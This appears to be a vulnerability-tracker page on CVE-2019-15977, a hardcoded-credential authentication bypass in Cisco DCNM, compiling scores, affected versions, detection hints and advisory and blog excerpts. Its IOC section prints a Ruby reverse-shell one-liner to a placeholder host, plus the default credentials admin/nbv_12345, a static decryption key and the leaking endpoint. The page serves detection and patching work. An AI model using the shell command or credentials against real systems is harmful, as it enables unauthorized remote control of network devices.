CVE-2019-15977
published 2020-01-06CVE-2019-15977: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…
PriorityP276high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
38.11%
98.4th percentile
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < n/a | n/a |
| cisco | data_center_network_manager | < 11.3\(1\) | 11.3\(1\) |
| cisco | data_center_network_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command{ruby,-rsocket,-e'c=TCPSocket.new("<ls>","<lp>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print(io.read)}end'}↗
snort↗
SID 52530 - 52547
- →Monitor for unauthenticated HTTP GET requests to /serverinfo/HtmlAdaptor?action=displayServerInfos using HTTP Basic Auth with hardcoded credentials (admin:nbv_12345); this endpoint leaks DB credentials, VFS paths, and SFTP credentials used to bypass authentication. ↗
- →The exploit decrypts leaked passwords using Blowfish ECB with the static key 'jaas is the way'; presence of this key in memory or network traffic is a strong indicator of exploitation activity against DCNM. ↗
- →Alert on Set-Cookie headers from DCNM containing both JSESSIONID (56-char) and resttoken patterns in the same response, indicating successful authentication bypass and session establishment. ↗
- →CVE-2019-15977 is classified under CWE-798 (Use of Hard-coded Credentials); hunt for use of the static credential pair admin/nbv_12345 against DCNM management interfaces. ↗
- ·The exploit was tested specifically against Cisco DCNM 11.2.1 ISO Virtual Appliance (VMware, KVM, Bare-metal); the hardcoded credential and Blowfish key behavior may differ across other DCNM versions. ↗
- ·There are no workarounds available for these vulnerabilities; only applying Cisco's released software updates fully remediates CVE-2019-15977. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
vendor_cisco9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·2020-01-02·CVSS 9.8
CVE-2019-15975 [CRITICAL] CWE-798 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.
For more information about these vulnerabilities, see the Details section of this advisory.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-15977 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
CVE-2019-15977: Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the
CVSS: 3.0
CWE: CWE-798, CWE-798
Bug IDs: CSCvq85945, CSCvq89859, CSCvq89898
GHSA
GHSA-vwxm-w88w-cmq3: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
ghsa_unreviewed·2022-05-24
CVE-2019-15977 [HIGH] CWE-798 GHSA-vwxm-w88w-cmq3: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
No detection rules found.
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos·2020-01-09
Threat Source newsletter (Jan. 9, 2019)
## Threat Source newsletter (Jan. 9, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing from attacks for state-sponsored actors, it’s already too late. We run down our thoughts on the situation here .
We also have our first Beers with Talos episode of the new year out, where the guys run down the
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos·2020-01-09
Threat Source newsletter (Jan. 9, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing from attacks for state-sponsored actors, it’s already too late. We run down our thoughts on the situation here.
We also have our first Beers with Talos episode of the new year out, where the guys run down the top threats of 2019 and talk about what less
Tenable
CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
blogs_tenable·2020-01-02·CVSS 9.8
[CRITICAL] CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/156242/Cisco-Data-Center-Network-Manager-11.2.1-Command-Injection.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypasshttp://packetstormsecurity.com/files/156242/Cisco-Data-Center-Network-Manager-11.2.1-Command-Injection.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
2020-01-06
Published